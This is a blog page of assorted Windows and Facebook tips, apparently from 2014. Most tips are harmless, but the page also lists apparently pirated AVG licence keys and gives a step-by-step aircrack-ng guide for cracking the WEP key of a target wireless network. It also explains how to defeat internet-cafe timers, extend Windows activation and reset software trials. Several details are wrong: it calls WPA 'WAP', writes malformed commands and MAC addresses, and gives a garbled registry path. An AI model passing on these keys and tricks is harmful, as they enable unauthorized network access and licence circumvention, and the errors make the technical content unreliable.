The command processor CMD.EXE comes with a mini calculator that can perform simple arithematic operations:
C:\>SET /A 5+3
8
C:\>SET /A 3*(9/4)
6
C:\>SET /A (4*5)/5
4

How to Create your own Run Command ?
Step 1: Go to “Start,” “Run,” (told you we use it a lot) and type regedit.

Step 2: Navigate to the following:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Apps Path

Step 3: Create a new folder/key under Apps Path. (Right-Click Apps Path and click “New,” “Key.”)

Step 4: Title the new folder/key the name of the application, e.g. firefox.exe.

Step 5: Right-Click the default string value (the thing automatically created in your new folder) and click Modify.

Step 6: Change the value to the path of the executable you are attempting to run. E.g. C:\Program Files\Mozilla Firefox\firefox.exe.

Step 7: Create a new “String Value” by right-clicking under the default value (the thing we just edited) and select “New,” “String Value.” Name it Path and enter the value as the same path you previously entered.

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Friday 30 May 2014

Posted By: Abhishek Anand
23
undefined




=


The keys ... (till 2018)

AVG Internet Security 2014 & AVG AntiVirus 2014

8MEH-RFOD4-SXWR8-JRTQA-JADCJ-WEMBR-ACED
8MEH-RNXBD-GMYHF-BSLSR-ZK3FE-PEMBR-ACED
8MEH-RU7JQ-ACDRM-MQEPR-G8D79-FEMBR-ACED
8MEH-RR6GC-KLJJD-S7DBA-NU862-EEMBR-ACED
8MEH-RPDWL-THRLY-O8Z3R-47QKC-4EMBR-ACED
8MEH-RS47Y-82HT8-GONVA-BCCCZ-DEMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTDO8-QEMBR-ACED
8MEH-RGM33-K474L-6FGRR-8QEFN-UEMBR-ACED
8MEH-R6BFE-HWUHF-DPNDA-VFUWX-2EMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTDO8-QEMBR-ACED
8MEH-RFR8J-PTS8Q-92ATA-ORC6Q-JEMBR-ACED
8MEH-RS47Y-82HT8-GONVA-BCCCZ-DEMBR-ACED
8MEH-RFR8J-PTS8Q-92ATA-O4WHO-JEMBR-ACED
XEETL-QXUPP-T39DN-A3L9F-TTTXL-JTWBA  (NEW)
XE2SY-UUH2U-I3MGR-Q2WN7-NS9AX-TNSWK (NEW)

AVG Internet Security 2014

8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED 
8MEH-RAJC2-O3P77-KRRQA-H3SLN-REMBR-ACED 
XEETL-QXUPP-T39DN-A3L9F-TTTXL-JTWBA (NEW)
XE2SY-UUH2U-I3MGR-Q2WN7-NS9AX-TNSWK (NEW)
IBY9X-ESYXT-W4BZQ-QI4WX-A9LI7-INRS3 (NEW)

AVG AntiVirus 2014

AECCX-6ONCU-OZGB2-ADZQA-XCD36-J7MTT (NEW)
XEOT9-LV9I3-WW6ZZ-QYZFE-ZTSAH-FG7DF (NEW)
XESAG-JUNUZ-22FON-AYDGZ-FAIFM-XVQ6H (NEW)
ABLAD-A2XEL-DUIGR-AIMDV-TAKLW-3WIDO (NEW)
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HOW TO HACK A WIFI NETWORK 
Posted By: Abhishek Anand
 
So.. Here’s how we do it..
1) First we need to scan for
available wireless networks.
Theres this great tool for
windows to do this.. called
“NetStumbler” or Kismet for
Windows and Linux and KisMac
for Mac
It’ll also show how the Wi-fi
network is secured..
The two most common
encryption types are:
1. WEP
2. WAP
WEP i.e Wire Equivalent Privacy
is not consideres as safe as WAP
i.e Wireless Application
Protocol.
WEPhave many flaws that
allows a hacker to crack a WEP
key easily.. whereas
WAPis currently the most
secure and best option to
secure a wi-fi network..
It can’t be easily cracked as WEP
because the only way to retreive
a WAP key is to use a brute-force
attack or dictionary atack.
Here I’ll tell you how to Crack
WEP
To crack WEP we will be using
Live Linux distribution called
BackTrack to crack WEP.
BackTrack have lots of
preinstalled softwares for this
very purpose..
Thetools we will be using on
Backtrack are:
Kismet – a wireless network
detector
airodump – captures packets
from a wireless router
aireplay – forges ARP requests
aircrack – decrypts the WEP keys
1. First of all we have to find a
wireless access point along with
its bssid, essid and channel
number. To do this we will run
kismet by opening up the
terminal and typing in kismet. It
may ask you for the appropriate
adapter which in my case is
ath0. You can see your device’s
name by typing in the command
iwconfig.
2.To be able to do some of the
later things, your wireless
adapter must be put into
monitor mode. Kismet
automatically does this and as
long as you keep it open, your
wireless adapter will stay in
monitor mode.
3. In kismet you will see the flags
Y/N/0. Each one stands for a
different type of encryption. In
our case we will be looking for
access points with the WEP
encryption. Y=WEP N=OPEN
0=OTHER(usually WAP).
4.Once you find an access point,
open a text document and paste
in the networks broadcast
name (essid), its mac address
(bssid) and its channel number.
To get the above information,
use the arrow keys to select an
access point and hit <ENTER> to
get more information about it.
5. The next step is to start
collecting data from the access
point with airodump. Open up a
new terminal and start
airodump by typing in the
command:
airodump-ng -c [channel#] -w
[filename] –bssid [bssid]
[device]
In the above command
airodump-ng starts the
program , the channel of your
access point goes after -c , the
file you wish to output the data
goes after -w , and the MAC
address of the access point goes
after –bssid. The command ends
with the device name. Make sure
to leave out the brackets.
6. Leave the above running and
open another terminal. Next we
will generate some fake packets
to the target access point so that
the speed of the data output will
increase. Put in the following
command:
aireplay-ng -1 0 -a [bssid] -h
00:11:22:33:44:55:66 -e [essid]
[device]
In the above command we are
using the airplay-ng program.
The -1 tells the program the
specific attack we wish to use
which in this case is fake
authentication with the access
point. The 0 cites the delay
between attacks, -a is the MAC
address of the target access
point, -h is your wireless
adapters MAC address, -e is the
name (essid) of the target
access point, and the command
ends with the your wireless
adapters device name.
7. Now, we will force the target
access point to send out a huge
amount of packets that we will
be able to take advantage of by
using them to attempt to crack
the WEP key. Once the following
command is executed, check
your airodump-ng terminal and
you should see the ARP packet
count to start to increase. The
command is:
aireplay-ng-3 -b [bssid] -h
00:11:22:33:44:5:66 [device]
In this command, the -3 tells the
program the specific type of
attack which in this case is
packet injection, -b is the MAC
address of the target access
point , -h is your wireless
adapters MAC address, and the
wireless adapter device name
goes at the end.
8. Once you have collected
around 50k-500k packets, you
may begin the attempt to break
the WEP key. The command to
begin the cracking process is:
aircrack-ng -a 1 -b [bssid] -n 128
[filename].ivs
In thiscommand the -a 1 forces
the program into the WEP attack
mode, the -b is the targets MAC
address, and the -n 128 tells the
program the WEP key length. If
you don’t know the -n , then
leave it out. This should crack the
WEP key within seconds. The
more packets you capture, the
bigger chance you have of
cracking the WEP key.

__________________________________________________________________________________________________________________________________________________________________
Request a new IP address from your ISP server

Posted By: Abhishek Anand

Here's how to do it in windows:
1. Click Start
2. Click run
3. In the run box type cmd.exe and click
OK
4.When the command prompt opens
type the following. ENTER after each new
line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
5.Erase your cookies in whatever
browser you are using.
Frequently you will be assigned a new IP
address when this happens. Sometime
you will, sometimes you will not. If you
are on a fixed IP address, this method
will not work. If this works for you, you
may want to save the above commands
into a batch file, and just run it when you
need it. This works if you have a Mobile
Broadband connection or PPPoE

----------------------------------------------------------------------------------------------------------------------------------
How To Invite to like a page in a single click  On Facebook

Posted By: Abhishek Anand

1. Click Invite Friends on whatever you 
are
inviting people to
2. In the dropdown next to the search box,
make sure Search All Friends or "Search by
name" is selected!
3. Scroll ALL the way down until names stop
loading (I found it easy to click the first
name and then hold down the spacebar or
Page Down button)
4. For EVENTS Copy this code:
javascript:elms=document.getEl
ementsByName("checkableitems[]");for
(i=0;i<elms.length;i++){if(elms[i].type="
checkbox" )elms[i].click()}
For PAGES Copy this code:
javascript:var inputs = document.getEle
mentsByClassName('uiButton _1sm');
for(var i=0; i<inputs.length;i++) {
inputs[i].click();
}
5. Past the code into the URL bar of your
browser (where you type website
addresses), but WAIT! Check the beginning
of the URL bar and make sure the word
"javascript:" is there, if it is not, TYPE IT IN!
A lot of browsers automatically delete the
"javascript:" portion. Press enter.
6. For large friends list, this may utilize all
your resources and will cause the page to
freeze and be unresponsive. Just wait a few
minutes until all the names get selected.
Facebook Tricks 

Posted By: Abhishek Anand

Useful Information: Must Share
Here's a way to keep your Facebook
account still safe if you forgot to logout due
to a power shortage/blackout or if you are
using a public computer (internet cafe).
Try this method:
Steps:
1. Log in to Facebook from your own
computer.
2. Click `Account Settings` and then click
`Security`
3. Click `Edit` button near to `Active
Sessions`.
4. You can see the Active Sessions , End all
Sessions by clicking `End Activity`.
5. Voila! You're currently logged-in account
on a public computer is now logged-out.
Disable Time limit in Cyber Cafe and use unlimited Internet
------------------------------------------------------------------------------------------------------------------------------
Posted By: Abhishek Anand


Alright , Were Gonna Learn How To Disable
The Timer On The Computers On In Internet
Cafe's. Alright Create A New Text
Document,Than Type CMD In It, And Than
Save It As a Batch File, And Than Run The
New Batch File On Your Desktop.
Than Command Prompt Should Open, Now
You Type "cd\windows" to change the
directory to Windows, than type in "regedit"
to get to the registry editor gui, than
navigate to
"HKEY_CURRENT_USER>Appevents>s
oftware>classes>
microsoft>windows>current
version>internet
settings>policies>system" than on the right
pane where it says Disable Taskmanager,
right
clickon it, and scroll down to modify, and
than
change the value of it to "0", and than open
Windows Task Manager By Holding Down
These Keys, "CTRL+ALT+DEL/DELETE" And
Than DisableThe Internet Cafe's Timer, And
WoohLAH, UNLIMTED TIME.
You can change the name of Recycle Bin icon

Posted By: Abhishek Anand

1-Click Start menu > Run > and type
“regedit” (without quotes), to run Windows
Registry Editor
2-Find and go to following
“HKEY_CLASSES_ROOT/CLSID/
{645FF040-5081-101B-9F08-00AA00
2F954E}”
3- double click on the default appear in the
right side, Change the name "Recycle Bin" to
whatever you want
Note :Incorrectly editing the registry may
severely damage your system.
Enjoy.

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
To Unlock the hidden themes on Windows7, do the following:

Posted By: Abhishek Anand

1. Open Windows Explorer
2. Click Organize , and select folder and
search Options.
3. Select show hidden files, folder and
drivers and uncheck Hide Protected
operating system file (Recommended). If
prompted with conformation click Yes
5. Click Ok
6. Browse the following folder: C:\windows
\Globlization\MCT\
7. There are five folder in the name with
format MCT-XX (Where XX is AU, CA, GB, or
ZA)which prepresents globalization settings
for each region. Go in to the folder that you
want to active its theme.
NOTE: AU, CA and ZA regions have the
same themes.
8. Open the theme folder inside the selected
region folder.
9. Double click on the XX. theme file to
apply the theme to the windows desktop
System

__________________________________________________________________________________________________________________________________________________________________
How To Make Window 7 Genuine Forever

Posted By: Abhishek Anand

1. Press Start + R
2. Type in CMD Press enter
3. Type in the command box "SLMGR -REAM"
4. Press Enter and wait a few second
5. Restart your PC
------------------------------------------------------------------------------------------------------------
>>How to reset the trial period of software to work it 
lifetime:-

Posted By: Abhishek Anand

Firstuninstall the software and
follow the steps.
*. After uninstalling software,
OpenRUN(Windows key + R)
and type regedit and hit Enter.
*. Now Registry Editor Window
will appear and here navigate
toHKEY_LOCAL_MA CHINE \
SOFTWARE \ Your Software
name from left pane of this
window. If you find any Key
name with your software
name then just Delete that Key.
*. Similarly navigate
toHKEY_CURRENT_ USER \
Software \ Your Software name
and if you find any key with
your software name then just
Delete it and close the Registry
Editor window.
*. Again go to RUN and type
%temp% and hit Enter.
*. Now Delete all the things in
that folder. Don’t worry these
are the temporary files and not
necessary for your operating
system.
*.Now go to C:\Users\your
username here\AppData.Un
der AppData open all three
folders"Local", "Local Low"
and "Roaming”and check.
Under these three folders if
you find any folder or anything
with your Software's name,
just delete it.
*. Now Restart your PC and
install the expired software
and you can use it again for
trial period."

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Popular Posts

Blog Archive